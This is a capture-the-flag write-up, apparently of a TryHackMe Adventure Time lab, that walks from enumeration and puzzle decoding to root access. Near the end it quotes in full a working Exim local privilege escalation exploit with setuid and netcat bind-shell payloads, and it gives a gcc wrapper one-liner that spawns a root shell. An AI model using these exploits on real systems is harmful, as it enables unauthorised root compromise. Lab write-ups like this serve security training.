Probably my favorite cartoon series of all time
First of all, we add the machine to known hosts like:
sudo echo "10.10.27.72 adventure.thm" | sudo tee -a /etc/hosts
Then I performed an Nmap scan:
nmap -sC -T4 -p- adventure.thm > sC.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-31 22:39 CEST
Nmap scan report for adventure.thm (10.10.27.72)
Host is up (0.050s latency ).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.74.136
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
| _End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230 )
| -r--r--r-- 1 ftp ftp 1401357 Sep 21 2019 1.jpg
| -r--r--r-- 1 ftp ftp 233977 Sep 21 2019 2.jpg
| -r--r--r-- 1 ftp ftp 524615 Sep 21 2019 3.jpg
| -r--r--r-- 1 ftp ftp 771076 Sep 21 2019 4.jpg
| -r--r--r-- 1 ftp ftp 1644395 Sep 21 2019 5.jpg
| _-r--r--r-- 1 ftp ftp 40355 Sep 21 2019 6.jpg
22/tcp open ssh
| ssh-hostkey:
| 2048 58:d2:86:99:c2:62:2d:95:d0:75:9c:4e:83:b6:1b:ca (RSA)
| 256 db:87:9e:06:43:c7:6e:00:7b:c3:bc:a1:97:dd:5e:83 (ECDSA)
| _ 256 6b:40:84:e6:9c:bc:1c:a8:de:b2:a1:8b:a3:6a:ef:f0 (ED25519)
80/tcp open http
| _http-title: 404 Not Found
443/tcp open https
| _http-title: You found Finn
| _ssl-date: TLS randomness does not represent time
| tls-alpn:
| _ http/1.1
| ssl-cert: Subject: commonName=adventure-time.com/organizationName=Candy Corporate Inc./stateOrProvinceName=Candy Kingdom/countryName=CK
| Not valid before: 2019-09-20T08:29:36
| _Not valid after: 2020-09-19T08:29:36
31337/tcp open Elite
Nmap done: 1 IP address (1 host up ) scanned in 18.59 seconds
As anonymous
login is allowed, Iโll start in port 21
. Connect via ftp ftp anonymous@adventure.thm
ftp> ls
+229 Entering Extended Passive Mode ( ||| 43148 | )
150 Here comes the directory listing.
-r--r--r-- 1 ftp ftp 1401357 Sep 21 2019 1.jpg
-r--r--r-- 1 ftp ftp 233977 Sep 21 2019 2.jpg
-r--r--r-- 1 ftp ftp 524615 Sep 21 2019 3.jpg
-r--r--r-- 1 ftp ftp 771076 Sep 21 2019 4.jpg
-r--r--r-- 1 ftp ftp 1644395 Sep 21 2019 5.jpg
-r--r--r-- 1 ftp ftp 40355 Sep 21 2019 6.jpg
I downloaded all the images. At a first sight, they just look like normal images, but then I looked for metadata.
Using exiftool
all the images had a piece of binary encrypted code:
1.jpg -> 01111001 01101111 01110101 00100000 -> you
2.jpg -> 01110010 01100101 01100001 01101100 01101100 01111001 00100000 -> really
3.jpg -> 01101100 01101001 01101011 01100101 00100000 -> like
4.jpg -> 01110100 01101111 00100000 -> to
5.jpg -> 01110000 01110101 01111010 01111010 01101100 01100101 00100000 -> puzzle
6.jpg -> 01100100 01101111 01101110 00100111 01110100 00100000 01111001 01100001 -> don't ya
Rabbit holeโฆ -_-
As I didnโt find anything in the ftp, I jumped to the 443
:
Letโs try to find Jake . I performed some enumeration using dirsearch ๐ .
dirsearch -u https://adventure.thm/ # this scan found nothing
# So I decided to perform a more detailed one
dirsearch -u https://adventure.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[REDACTED]
[23:04:45] Starting:
[23:07:17] 301 - 319B - /candybar - > https://adventure.thm/candybar/
So I search for https://10.10.27.72/candybar/
and found:
Weโve found a base32
encoded message, so I went to Cyberchef to decode it:
The encoded message was also in the source code of the page: KBQWY4DONAQHE53UOJ5CA2LXOQQEQSCBEBZHIZ3JPB2XQ4TQNF2CA5LEM4QHEYLKORUC4===
It gave me as result what seemed to be a ROT13
message encoded, so I went to dcode.fr and decrypted this:
It clearly indicates me to check the SSL certificate, so I went to it:
Now weโve got another domain: land-of-ooo.com
, so we add it to the known hosts. We found Jake!!
So itโs time to perform another enumeration with dirsearch ๐ again:
dirsearch -u https://land-of-ooo.com/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[REDACTED]
[23:23:12] Starting:
[23:25:31] 301 - 322B - /yellowdog - > http://land-of-ooo.com/yellowdog/
So letโs find out whatโs inside /yellowdog
:
So again Iโll do more enumeration inside the /yellowdog
directory:
dirsearch -u https://land-of-ooo.com/yellowdog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[REDACTED]
[23:27:48] Starting: yellowdog/
[23:34:29] 301 - 334B - /yellowdog/bananastock - > http://land-of-ooo.com/yellowdog/bananastock/
So I checked the /yellowdog/bananastock
directory:
Again in the page source was the encrypted message: _/..../.\_.../._/_./._/_./._/...\._/._./.\_/..../.\_..././.../_/_._.__/_._.__/_._.__
It seems like some kind of morse code doesnโt it? Again, I came back to check Cyberchef :
It said THE BANANAS ARE THE BEST!!!
So again I decided to do a further enumeration inside that subdirectory (because I havenโt enough info yet):
dirsearch -u https://land-of-ooo.com/yellowdog/bananastock -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[REDACTED]
[23:45:27] Starting: yellowdog/bananastock/
[23:59:01] 301 - 343B - /yellowdog/bananastock/princess - > http://land-of-ooo.com/yellowdog/bananastock/princess/
New subdirectory found: /yellowdog/bananastock/princess
If we take a look at the page source we find the following:
Secrettext = 0008f1a92d287b48dccb5079eac18ad2a0c59c22fbc7827295842f670cdb3cb645de3de794320af132ab341fe0d667a85368d0df5a3b731122ef97299acc3849cc9d8aac8c3acb647483103b5ee44166
Key = my cool password
IV = abcdefghijklmanopqrstuvwxyz
Mode = CBC
Input = hex
Output = raw
It seems to be AES, so I went again to https://cyberchef.org/ to decrypt the message:
So now, we know that the password for port 31337
is ricardio
:
I used telnet
to connect to that port
So now I connected via ssh to the machine (use the banannasโ password):
ssh apple-guards@land-of-ooo.com
We can get the flag1
:
I looked what was inside mbox
:
So Iโll search for any file hid by the user marceline
:
find / -type f -user "marceline" 2> /dev/null
/etc/fonts/helper
It seems like Vigenรจre cipher, so I went to cryptii
And got Abadeer
Another password My friend Finn
for user marceline
We can now log in as marceline
and get flag2
:
Then, I investigaated a file called I_got_a_secret.txt
, which contained:
Hello Finn,
I heard that you pulled a fast one over the banana guards.
B was very upset hahahahaha.
I also heard you guys are looking for BMO's resetcode.
You guys broke him again with those silly games?
You know I like you Finn, but I don't want to anger B too much.
So I will help you a little bit...
But you have to solve my little puzzle. Think you're up for it?
Hahahahaha....I know you are.
111111111100100010101011101011111110101111111111011011011011000001101001001011111111111111001010010111100101000000000000101001101111001010010010111111110010100000000000000000000000000000000000000010101111110010101100101000000000000000000000101001101100101001001011111111111111111111001010000000000000000000000000001010111001010000000000000000000000000000000000000000000001010011011001010010010111111111111111111111001010000000000000000000000000000000001010111111001010011011001010010111111111111100101001000000000000101001111110010100110010100100100000000000000000000010101110010100010100000000000000010100000000010101111100101001111001010011001010010000001010010100101011100101001101100101001011100101001010010100110110010101111111111111111111111111111111110010100100100000000000010100010100111110010100000000000000000000000010100111111111111111110010100101111001010000000000000001010
I thought that the message could be Binary, but it wasnโt, so after minutes of crying I found spoon programming language decoder
It decoded: The magic word you are looking for is ApplePie
So now we can perform again the telnet conexion to the port 31337 with the new magic word:
telnet land-of-ooo.com 31337
We get another password:
User peppermint-butler
has the password That Black Magic
We can find flag3
in its home directory:
There was an image in its home directory, which I downloaded to my machine using scp :
scp -P 22 peppermint-butler@land-of-ooo.com:/home/peppermint-butler/butler-1.jpg adventure_time
ยฟAnother rabbit hole? It seems to be :(
So I decided to search inside the machine a file owned by the user peppermint
:
find / -type f -user peppermint-butler 2> /dev/null
[REDACTED]
/etc/php/zip.txt
/usr/share/xml/steg.txt
The steg.txt
contained:
I need to keep my secrets safe.
There are people in this castle who can't be trusted.
Those banana guards are not the smartest of guards.
And that Marceline is a friend of princess Bubblegum,
but I don't trust her.
So I need to keep this safe.
The password of my secret file is 'ToKeepASecretSafe'
The zip.txt
contained:
I need to keep my secrets safe.
There are people in this castle who can't be trusted.
Those banana guards are not the smartest of guards.
And that Marceline is a friend of princess Bubblegum,
but I don't trust her.
So I need to keep this safe.
The password of my secret file is 'ThisIsReallySave'
So I extracted data from the previous image:
steghide extract -sf butler-1.jpg # with passwd: ToKeepASecretSafe
# then
unzip secrets.zip # with passwd: ThisIsReallySave
Inside the extracted secrets.txt
was:
[0200 hours][upper stairs]
I was looking for my arch nemesis Peace Master,
but instead I saw that cowering little puppet from the Ice King.....gunter.
What was he up to, I don't know.
But I saw him sneaking in the secret lab of Princess Bubblegum.
To be able to see what he was doing I used my spell 'the evil eye' and saw him.
He was hacking the secret laptop with something small like a duck of rubber.
I had to look closely, but I think I saw him type in something.
It was unclear, but it was something like 'The Ice King s????'.
The last 4 letters where a blur.
Should I tell princess Bubblegum or see how this all plays out?
I don't know.......
So we should do some brute forcing to The Ice King s????
, but Iโve seen the series I can say that he sucks
haha.
So we can login as gunter
and get flag4
:
I noticed that this user is part of the gcc
so technically it can create a root shell. If we do the following:
/usr/bin/gcc-5 -wrapper /bin/sh,-s .
Now we just need to log in as the bubblegum princess. So in a previous image she was worried about gunter finding her secrets in her mail. The mail is called exim4
and we can find an exploit in Exploit-db :
#!/bin/bash
METHOD = "setuid" # default method
PAYLOAD_SETUID = '${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT = '${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
# usage instructions
function usage ()
{
echo " $0 [-m METHOD]"
echo
echo "-m setuid : use the setuid payload (default)"
echo "-m netcat : use the netcat payload"
echo
exit 1
}
# payload delivery
function exploit ()
{
# connect to localhost:25
exec 3 <> /dev/tcp/localhost/60000
# deliver the payload
read -u 3 && echo $REPLY
echo "helo localhost" >&3
read -u 3 && echo $REPLY
echo "mail from:<>" >&3
read -u 3 && echo $REPLY
echo "rcpt to:< $PAYLOAD >" >&3
read -u 3 && echo $REPLY
echo "data" >&3
read -u 3 && echo $REPLY
for i in { 1..31}
do
echo "Received: $i " >&3
done
echo "." >&3
read -u 3 && echo $REPLY
echo "quit" >&3
read -u 3 && echo $REPLY
}
# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo
# parse command line
while [ ! -z " $1 " ]; do
case $1 in
-m ) shift ; METHOD = " $1 " ; shift ;;
* ) usage
;;
esac
done
if [ -z $METHOD ]; then
usage
fi
# setuid method
if [ $METHOD = "setuid" ]; then
# prepare a setuid shell helper to circumvent bash checks
echo "Preparing setuid shell helper..."
echo "main(){setuid(0);setgid(0);system( \" /bin/sh \" );}" > /tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c 2> /dev/null
if [ $? -ne 0 ]; then
echo "Problems compiling setuid shell helper, check your gcc."
echo "Falling back to the /bin/sh method."
cp /bin/sh /tmp/pwned
fi
echo
# select and deliver the payload
echo "Delivering $METHOD payload..."
PAYLOAD = $PAYLOAD_SETUID
exploit
echo
# wait for the magic to happen and spawn our shell
echo "Waiting 5 seconds..."
sleep 5
ls -l /tmp/pwned
/tmp/pwned
# netcat method
elif [ $METHOD = "netcat" ]; then
# select and deliver the payload
echo "Delivering $METHOD payload..."
PAYLOAD = $PAYLOAD_NETCAT
exploit
echo
# wait for the magic to happen and spawn our shell
echo "Waiting 5 seconds..."
sleep 5
nc -v 127.0.0.1 31337
# print help
else
usage
fi
Note that I modified the port (there was a 25 before) and the service is currently running on port 60000.
Also take into account that you need to run it like: ./shell.sh -m setuid
And we are root and we can get the flag5
:
cat /home/bubblegum/Secrets/bmo.txt
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Secret project number: 211243A
Name opbject: BMO
Rol object: Spy
In case of emergency use resetcode: tryhackme{HIDDEN}
-------
Good job on getting this code!!!!
You solved all the puzzles and tried harder to the max.
If you liked this CTF, give a shout out to @n0w4n.
Machine pwned!